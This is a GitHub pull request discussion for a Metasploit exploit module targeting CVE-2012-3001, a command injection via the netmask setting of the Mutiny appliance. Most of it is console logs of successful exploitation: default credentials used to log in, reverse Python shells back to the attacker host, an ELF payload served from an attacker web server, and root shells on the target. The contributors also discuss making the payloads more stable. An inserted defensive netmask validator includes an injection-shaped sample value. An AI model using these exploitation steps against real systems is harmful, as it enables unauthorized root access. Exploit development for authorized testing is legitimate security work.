
added module for cve-2012-3001 #1557

Merged
merged 3 commits into from Mar 22, 2013

Conversation

jvazquez-r7
Contributor

Tested successfully with Mutiny 4.2-1.05 as distributed on the vendor page:

http://www.mutiny.com/support/downloads/Mutiny-Build-CD-4.2-1.05.iso

Notes:

  • The python payload is the most stable in this case, since the others (perl and bash) are executed multiple times after injection, which is annoying. Since python is installed by default in the Mutiny appliance, it sounds like a good option to me.
  • The exploitation modifies network parameters (mainly the netmask); because of this, the exploit tries to leak the original parameters and restores the original network configuration after exploitation.

Test results:

msf  exploit(mutiny_subnetmask_exec) > show options

Module options (exploit/unix/webapp/mutiny_subnetmask_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   mutiny           yes       The password to authenticate with
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.177    yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /interface/      yes       The base path to Mutiny
   USERNAME   admin            yes       The user to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_python):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.128    yes       The listen address
   LPORT  4444             yes       The listen port
   SHELL  /bin/bash        yes       The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(mutiny_subnetmask_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.177:80 - Login with the provided credentials...
[+] 192.168.1.177:80 - Login successful
[*] 192.168.1.177:80 - Leaking current Network Information...
[+] 192.168.1.177:80 - Information leaked successfully
[*] 192.168.1.177:80 - Exploiting Command Injection...
[*] Command shell session 2 opened (192.168.1.128:4444 -> 192.168.1.177:40294) at 2013-03-07 14:19:39 +0100
[*] 192.168.1.177:80 - Restoring Network information
[+] 192.168.1.177:80 - Network information restored

bash: no job control in this shell
[root@mutiny-unknown network-scripts]# 1901772573
vycrgtyayFoxCpkHpOhvWdHTBrhiyHQW
[root@mutiny-unknown network-scripts]# [root@mutiny-unknown network-scripts]# Shutting down interface eth0:  [  OK  ]
Shutting down loopback interface:  [  OK  ]
Bringing up loopback interface:  [  OK  ]
Bringing up interface eth0:  [  OK  ]
Bringing up interface eth1:  Device eth1 does not seem to be present, delaying initialization.
[FAILED]
AlAeyCxLgWGvROEByrhXlZpIUMuaacki
[root@mutiny-unknown network-scripts]# id
uid=0(root) gid=0(root)
[root@mutiny-unknown network-scripts]# uname -a
Linux mutiny-unknown 2.6.15-1.1833_FC4smp #1 SMP Wed Mar 1 23:56:51 EST 2006 i686 i686 i386 GNU/Linux
[root@mutiny-unknown network-scripts]# exit
exit

[*] 192.168.1.177 - Command shell session 2 closed.  Reason: Died from EOFError
^C
Abort session 2? [y/N]  y
msf  exploit(mutiny_subnetmask_exec) > 
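The second note in the PR description points at the root cause: a netmask value from the web interface reaches the network-scripts configuration and a shell-driven network restart without validation. As an added example (not the module's code and not Mutiny's), this is the allow-list check a web front end should apply before such a value touches an ifcfg file or a command line; the sample values are constructed, including one shaped like an injection attempt.

```python
def validate_netmask(value: str) -> str:
    """Return the canonical dotted-quad form of a valid IPv4 netmask.

    Raises ValueError for anything else. The check is an allow-list:
    exactly four ASCII decimal octets, each 0-255, whose 32-bit value is a
    run of leading 1-bits followed by 0-bits. Because only digits and dots
    can pass, shell metacharacters such as ';', '|' or '`' never reach the
    NETMASK= line in network-scripts or a 'service network restart' call.
    """
    if not isinstance(value, str) or not 7 <= len(value) <= 15:
        raise ValueError("netmask: bad length")
    parts = value.split(".")
    if len(parts) != 4 or not all(p.isascii() and p.isdigit() and len(p) <= 3 for p in parts):
        raise ValueError("netmask: expected four decimal octets")
    octets = [int(p) for p in parts]
    if any(o > 255 for o in octets):
        raise ValueError("netmask: octet out of range")
    bits = int.from_bytes(bytes(octets), "big")
    # Contiguity test: the bitwise complement of a valid mask is 2^k - 1,
    # so adding one to it must yield a power of two (inv & (inv + 1) == 0).
    inv = (~bits) & 0xFFFFFFFF
    if inv & (inv + 1):
        raise ValueError("netmask: non-contiguous mask bits")
    # Canonical form drops leading zeros, so '255.255.255.000' -> '255.255.255.0'.
    return ".".join(str(o) for o in octets)


def is_valid_netmask(value: str) -> bool:
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        validate_netmask(value)
        return True
    except ValueError:
        return False


# Constructed sample inputs: what a form handler might receive.
SAMPLES = {
    "255.255.255.0": True,
    "255.255.254.000": True,       # leading zeros are canonicalised, not rejected
    "0.0.0.0": True,               # /0 is a legal (if unusual) mask
    "255.0.255.0": False,          # non-contiguous bits
    "255.255.255.0;id": False,     # injection-shaped: metacharacters never pass
    "255.255.255.0 ": False,       # trailing whitespace
    "255.255.255": False,          # too few octets
    "256.255.255.0": False,        # octet out of range
}

if __name__ == "__main__":
    for sample, expected in SAMPLES.items():
        assert is_valid_netmask(sample) is expected, sample
    print("all constructed samples classified as expected")
```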

@L1ghtn1ng
Contributor

@jvazquez-r7, to get the bash payload more stable and only run once, how about getting the exploit to drop a shell script to the system, then run that for the bash payload? Then, when the user quits out, it automatically removes that file in the cleanup. Just an idea for you to contemplate, to maybe make it more stable.

@jvazquez-r7
Contributor Author

Hi @L1ghtn1ng, I'm glad to hear there is interest!! Even better, I think: I'm going to work on a new target to execute Linux payloads :) so staging from CMD to meterpreter or shell payloads will be possible :)

Please, in case someone looks into it, don't merge atm; lemme add a new target and make Linux payloads available to the user :)

Thanks!

juan

@L1ghtn1ng
Contributor

On 07/03/13 14:53, Juan Vazquez wrote:

Hi @L1ghtn1ng, I'm glad to hear there is interest!! Even better, I think: I'm going to work on a new target to execute Linux payloads :) so staging from CMD to meterpreter or shell payloads will be possible :)

Please, in case someone looks into it, don't merge atm; lemme add a new target and make Linux payloads available to the user :)

Thanks!

juan


Fair enough, it was just an idea for you to see if that would help.

@jvazquez-r7
Contributor Author

I've added a new Linux native target and set it as the default target. My only concern is that I cannot specify the compatible cmd payloads in the targets section. The console doesn't take it into account, and the user can select any available cmd payload.

  • Test with Linux target:
msf  exploit(mutiny_subnetmask_exec) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.177:80 - Login with the provided credentials...
msf  exploit(mutiny_subnetmask_exec) > [+] 192.168.1.177:80 - Login successful
[*] 192.168.1.177:80 - Leaking current Network Information...
[+] 192.168.1.177:80 - Information leaked successfully
[*] 192.168.1.177:80 - Exploiting Command Injection...
[*] 192.168.1.177:80 - Generating the ELF Payload...
[*] 192.168.1.177:80 - Setting up the Web Service...
[*] 192.168.1.177:80 - Starting up our web service on http://192.168.1.128:8080/Gfquf.elf ...
[*] Using URL: http://0.0.0.0:8080/Gfquf.elf
[*]  Local IP: http://192.168.1.128:8080/Gfquf.elf
[+] 192.168.1.177:80 - Sending the ELF payload to the target...
[*] Sending stage (36 bytes) to 192.168.1.177
[*] Command shell session 2 opened (192.168.1.128:4444 -> 192.168.1.177:36513) at 2013-03-07 19:08:52 +0100
[*] 192.168.1.177:80 - Restoring Network Information and Cleanup...
[*] 192.168.1.177:80 - Waiting for the victim to request the ELF payload...
[*] 192.168.1.177:80 - Shutting down the web service...

msf  exploit(mutiny_subnetmask_exec) > sessions -i 2
[*] Starting interaction with 2...

2981886236
wcoXxgevxrIenaiWPWNJQRtFibUdWgFJ
Shutting down interface eth0:  [  OK  ]
Shutting down loopback interface:  [  OK  ]
Bringing up loopback interface:  [  OK  ]
Bringing up interface eth0:  [  OK  ]
Bringing up interface eth1:  Device eth1 does not seem to be present, delaying initialization.
[FAILED]
hDEzbrDyCJDtIFicHJDmjVVCANxGQBGA


id
uid=0(root) gid=0(root)
uname -a
Linux mutiny-unknown 2.6.15-1.1833_FC4smp #1 SMP Wed Mar 1 23:56:51 EST 2006 i686 i686 i386 GNU/Linux
^C
Abort session 2? [y/N]  y

  • Test with unix cmd target:
msf  exploit(mutiny_subnetmask_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf  exploit(mutiny_subnetmask_exec) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf  exploit(mutiny_subnetmask_exec) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.177:80 - Login with the provided credentials...
msf  exploit(mutiny_subnetmask_exec) > [+] 192.168.1.177:80 - Login successful
[*] 192.168.1.177:80 - Leaking current Network Information...
[+] 192.168.1.177:80 - Information leaked successfully
[*] 192.168.1.177:80 - Exploiting Command Injection...
[*] Command shell session 3 opened (192.168.1.128:4444 -> 192.168.1.177:36515) at 2013-03-07 19:09:41 +0100
[*] 192.168.1.177:80 - Restoring Network Information and Cleanup...
msf  exploit(mutiny_subnetmask_exec) > 
msf  exploit(mutiny_subnetmask_exec) > sessions 

Active sessions
===============

  Id  Type    Information  Connection
  --  ----    -----------  ----------
  3   shell                192.168.1.128:4444 -> 192.168.1.177:36515 (192.168.1.177)

msf  exploit(mutiny_subnetmask_exec) > sessions -i 3
[*] Starting interaction with 3...

bash: no job control in this shell
[root@mutiny-unknown network-scripts]# 3055540342
csOhKyjJyBScBeodhzVgpQFVpDIRHIpr
[root@mutiny-unknown network-scripts]# [root@mutiny-unknown network-scripts]# Shutting down interface eth0:  [  OK  ]
Shutting down loopback interface:  [  OK  ]
Bringing up loopback interface:  [  OK  ]
Bringing up interface eth0:  [  OK  ]
Bringing up interface eth1:  Device eth1 does not seem to be present, delaying initialization.
[FAILED]
OVQLvTFPFTSVOWaqxTFXEjarJdLDooOJ
[root@mutiny-unknown network-scripts]# id
uid=0(root) gid=0(root)
[root@mutiny-unknown network-scripts]# ^C
Abort session 3? [y/N]  y


@L1ghtn1ng
Contributor

Hey @jvazquez-r7, just wondering, would implementing the features of PR #1275 into this module help? Thought it might be a good idea for you to take a look at.

@wchen-r7 wchen-r7 merged commit 25db782 into rapid7:master Mar 22, 2013
@jvazquez-r7 jvazquez-r7 deleted the mutiny_subnetmask_exec branch November 18, 2014 15:52